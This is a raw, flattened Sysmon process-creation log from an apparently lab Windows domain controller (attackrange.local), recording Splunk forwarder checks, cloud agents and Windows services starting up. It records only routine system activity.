AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E01-6078-4F00-00000000AE01}3112C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 154100x80000000000000002146Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:09.558{A8622C2F-3E01-6078-4F00-00000000AE01}3112C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000002129Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:09.252{A8622C2F-3E01-6078-4E00-00000000AE01}2680C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 
154100x80000000000000002111Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.970{A8622C2F-3E00-6078-4D00-00000000AE01}3596C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000002098Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.956{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3E00-6078-4B00-00000000AE01}3648C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 154100x80000000000000002085Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.950{A8622C2F-3E00-6078-4B00-00000000AE01}3648C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002070Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.875{A8622C2F-3E00-6078-4A00-00000000AE01}2104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'" "| Select-Object" "ProductName, BuildLabEx, CurrentMajorVersionNumber, CurrentMinorVersionNumber" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002057Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.621{A8622C2F-3E00-6078-4900-00000000AE01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E00-6078-4800-00000000AE01}4036C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 154100x80000000000000002044Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.614{A8622C2F-3E00-6078-4800-00000000AE01}4036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E00-6078-4700-00000000AE01}4024C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 154100x80000000000000002031Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.608{A8622C2F-3E00-6078-4700-00000000AE01}4024C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFF-6078-3D00-00000000AE01}3712C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x80000000000000002014Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:22:08.543{A8622C2F-3E00-6078-4600-00000000AE01}3996C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get Version /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000001997Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.907{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe-----"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=532894851130E19A62E811A3C7E2B6A6,SHA256=950F8FCDD05F9DD8D1C9E4C9B6D7D18644F662683A1942BD70B1028FA595119C,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{A8622C2F-3DFE-6078-2A00-00000000AE01}2500C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 154100x80000000000000001963Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.319{A8622C2F-3E00-6078-4400-00000000AE01}3864C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E00-6078-4300-00000000AE01}3844C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general 
--no-log 154100x80000000000000001950Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.312{A8622C2F-3E00-6078-4300-00000000AE01}3844C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E00-6078-4200-00000000AE01}3832C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 154100x80000000000000001937Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.306{A8622C2F-3E00-6078-4200-00000000AE01}3832C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFF-6078-3D00-00000000AE01}3712C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x80000000000000001855Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.973{A8622C2F-3DFF-6078-4000-00000000AE01}3764C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3DFF-6078-3F00-00000000AE01}3744C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 154100x80000000000000001851Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.964{A8622C2F-3DFF-6078-3F00-00000000AE01}3744C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3DFF-6078-3E00-00000000AE01}3732C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 154100x80000000000000001847Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.956{A8622C2F-3DFF-6078-3E00-00000000AE01}3732C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFF-6078-3D00-00000000AE01}3712C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x80000000000000001843Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.942{A8622C2F-3DFF-6078-3D00-00000000AE01}3712C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3DFF-6078-3C00-00000000AE01}3700C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x80000000000000001839Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.936{A8622C2F-3DFF-6078-3C00-00000000AE01}3700C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000001831Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.886{A8622C2F-3DFF-6078-3900-00000000AE01}3636C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3DFF-6078-3700-00000000AE01}3572C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 154100x80000000000000001682Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.552{A8622C2F-3DFF-6078-3700-00000000AE01}3572C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000001634Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.566{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001493Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:22:06.860{A8622C2F-3DFE-6078-3600-00000000AE01}3336C:\Windows\System32\vds.exe10.0.14393.4169 (rs1_release.210107-1130)Virtual Disk ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationvds.exeC:\Windows\System32\vds.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F43B67F8FB870A731294662603690C2F,SHA256=9707255C9778F9A8135BAA4F1A16FAC9EBF2991FD6AF937B232D5FA52D14AC33,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001484Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.817{A8622C2F-3DFE-6078-3500-00000000AE01}3268C:\Windows\System32\vdsldr.exe10.0.14393.4169 (rs1_release.210107-1130)Virtual Disk Service LoaderMicrosoft® Windows® Operating SystemMicrosoft Corporationvdsldr.exeC:\Windows\System32\vdsldr.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B344B812DD6C294360563E52B2EF1C13,SHA256=0A4CA31848D7513F97F72D0292F5BBEE1CA409AAFFCACDE5369E12003B34118D,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x80000000000000001481Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.528{A8622C2F-3DFE-6078-2A00-00000000AE01}2500C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe-----"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=44CFD427E8845A455BDE9B7284CD042B,SHA256=EAD9E26AF8996DDC2723D3D393F31D16DBEBDF448702BBBC60BB19831970C7AA,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 
154100x80000000000000001478Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.746{A8622C2F-3DFE-6078-3400-00000000AE01}3184C:\Windows\System32\wbem\unsecapp.exe10.0.14393.4169 (rs1_release.210107-1130)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=2443CA5962E2134CB389DCD5056D27AE,SHA256=018FF62BCDC292CF9290DB0574C8EF9C97EBC26933C8FC950DD8E6B2B91972FB,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x80000000000000001459Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.575{A8622C2F-3DFE-6078-3100-00000000AE01}2212C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001456Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.555{A8622C2F-3DFE-6078-2E00-00000000AE01}2864C:\Windows\System32\dfsrs.exe10.0.14393.4169 (rs1_release.210107-1130)Distributed File System ReplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationdfsr.exeC:\Windows\system32\DFSRs.exeC:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F2483716D6C752FB448C7295AA3B49A1,SHA256=6B77249159D3C217694B52F0B1C75E0649486EF4A3FE4513CD41D81E7DEB709A,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001453Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.577{A8622C2F-3DFE-6078-3300-00000000AE01}2992C:\Windows\System32\dfssvc.exe10.0.14393.4283 (rs1_release.210303-1802)Windows NT Distributed File System ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdfssvc.exeC:\Windows\system32\dfssvc.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8548C5144E55B79299A0880858A9AF13,SHA256=1EA1D6DB68F92535811D71CA97C2B3A9F9D3409DE8C5FA089658E73B7D3A0689,IMPHASH=D38366C43D0F6223104A675303D8E8CB{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001449Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.575{A8622C2F-3DFE-6078-3200-00000000AE01}2480C:\Program Files\Amazon\XenTools\LiteAgent.exe1.0xenagentXENIFACEAmazon Inc.xenagent.exe"C:\Program Files\Amazon\XenTools\LiteAgent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001446Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.550{A8622C2F-3DFE-6078-2C00-00000000AE01}2876C:\Windows\System32\dns.exe10.0.14393.4283 (rs1_release.210303-1802)Domain Name System (DNS) ServerMicrosoft® Windows® Operating SystemMicrosoft 
Corporationdns.exeC:\Windows\system32\dns.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8DD15A9DA01C57E0C12E95A5B4A8D242,SHA256=CA8C55567793E0CF2D297E19736F5F5F88430CAB5E3EB9A2160052D39FC9F88D,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001422Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.553{A8622C2F-3DFE-6078-2D00-00000000AE01}2856C:\Windows\System32\ismserv.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Intersite Messaging ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationismserv.exeC:\Windows\System32\ismserv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001403Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.528{A8622C2F-3DFE-6078-2B00-00000000AE01}2552C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe10.0.14393.4046Microsoft.ActiveDirectory.WebServicesMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.ActiveDirectory.WebServices.exeC:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=868245AE57651C1D8889B528A182C81A,SHA256=2BA73582B4334AEDA469B97D528C24CCB2392FD189524198017D59DF4C4F6504,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001385Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
